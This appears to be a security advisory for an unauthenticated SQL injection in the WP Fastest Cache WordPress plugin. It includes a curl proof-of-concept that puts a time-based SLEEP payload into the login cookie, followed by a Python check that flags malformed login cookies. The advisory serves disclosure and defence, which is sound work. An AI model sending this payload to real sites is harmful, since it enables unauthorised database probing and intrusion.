Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
1. Visit WP Fastest Cache > Settings. Ensure "Cache System" is enabled, and "Logged-in Users" is disabled. Click "Submit" at the bottom.
2. The following curl command demonstrates the SQLi:
curl https://example.com -H "Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"
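A request-side check for the cookie value shown in step 2, as an added example that is not part of the original advisory or the plugin's code: it percent-decodes every cookie whose name starts with wordpress_logged_in and flags values that do not have the login|expiry|token|hmac layout WordPress core issues. The function names, the allowed login alphabet and the benign sample cookie are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# WordPress core names the cookie "wordpress_logged_in_<hash>"; the request in
# step 2 sends the bare prefix, so match on the prefix.
COOKIE_PREFIX = "wordpress_logged_in"

# Assumed genuine layout (WordPress core): login|expiry|token|hmac.
# Assumed login alphabet: letters, digits, space and _ . - @
GENUINE = re.compile(
    r"[A-Za-z0-9 _.@-]{1,60}\|\d{1,12}\|[A-Za-z0-9]{1,64}\|[0-9a-f]{40,64}"
)


def parse_cookie_header(header):
    """Return {name: percent-decoded value} for a raw Cookie header value."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")  # split on first "=" only
        if sep:
            cookies[name] = unquote(value)
    return cookies


def suspicious_login_cookies(header):
    """List (name, decoded value) for login cookies that are not well-formed."""
    return [
        (name, value)
        for name, value in parse_cookie_header(header).items()
        if name.startswith(COOKIE_PREFIX) and not GENUINE.fullmatch(value)
    ]


# Cookie header value from step 2 of this page.
POC_HEADER = (
    "wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20"
    "(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"
)
# Constructed well-formed cookie (made-up login, token and MAC).
BENIGN_HEADER = (
    "theme=dark; wordpress_logged_in_" + "0f" * 16
    + "=alice%7C1900000000%7C" + "Ab3" * 14 + "%7C" + "c4" * 32
)

if __name__ == "__main__":
    for label, header in (("poc", POC_HEADER), ("benign", BENIGN_HEADER)):
        print(label, suspicious_login_cookies(header))
```

The check only confirms the value's shape, not that the MAC is valid, so it suits a reverse-proxy or logging filter in front of the site rather than a replacement for escaping the value inside the plugin.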